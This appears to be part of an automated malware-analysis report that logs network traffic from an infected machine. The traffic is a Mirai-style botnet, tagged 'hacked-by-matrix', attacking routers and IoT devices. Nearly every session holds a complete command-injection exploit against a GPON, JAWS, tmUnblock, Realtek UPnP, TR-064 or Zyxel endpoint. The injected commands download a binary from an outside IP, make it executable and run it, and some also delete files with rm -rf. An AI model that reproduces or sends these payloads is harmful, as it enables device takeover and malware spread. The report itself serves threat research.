                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2024192.168.2.1339300109.1.136.91443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:40.867146015 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2025192.168.2.133432865.254.227.21480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:41.321032047 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:45.580264091 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:45.672950983 CET1INData Raw: 0a
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2026192.168.2.1344160172.105.9.20480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:41.333556890 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:41.439399004 CET371INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:41 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2027192.168.2.135456654.215.202.16880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:41.390305996 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:41.909868956 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2028192.168.2.1359270184.176.170.78080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:41.564366102 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:42.161520958 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2029192.168.2.1346572172.65.160.38080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:41.665484905 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2030192.168.2.13467968.146.241.10552869
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:41.787564993 CET975OUTPOST /picdesc.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2031192.168.2.133996047.142.43.2117547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:41.814171076 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:42.735348940 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2032192.168.2.1335352118.240.97.47547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:41.925642967 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:42.205817938 CET88INHTTP/1.1 500 Internal Server Error
                                                        Connection: Close
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2033192.168.2.1348164178.33.209.4180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:42.597412109 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:43.121385098 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:43.282983065 CET323INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.18.0
                                                        Date: Thu, 21 Mar 2024 04:23:43 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Content-Encoding: gzip
                                                        Data Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzzJaC0
                                                        Mar 21, 2024 05:23:43.283039093 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0
                                                        Date: Thu, 21 Mar 2024 04:23:43 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2034192.168.2.135329286.189.121.14180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:42.618714094 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:43.161648989 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:43.332627058 CET269INHTTP/1.1 400 Bad Request
                                                        Server: EdgePrism/5.1.8.0
                                                        Mime-Version: 1.0
                                                        Date: Thu, 21 Mar 2024 04:23:43 GMT
                                                        Content-Type: text/plain
                                                        Expires: Thu, 21 Mar 2024 04:23:43 GMT
                                                        X-LLID: ab7d73d38b0e9547f35a7b2564153767
                                                        Content-Length: 0
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2035192.168.2.1355788213.139.38.1480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:42.653646946 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:43.792226076 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:45.132428885 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:47.884205103 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
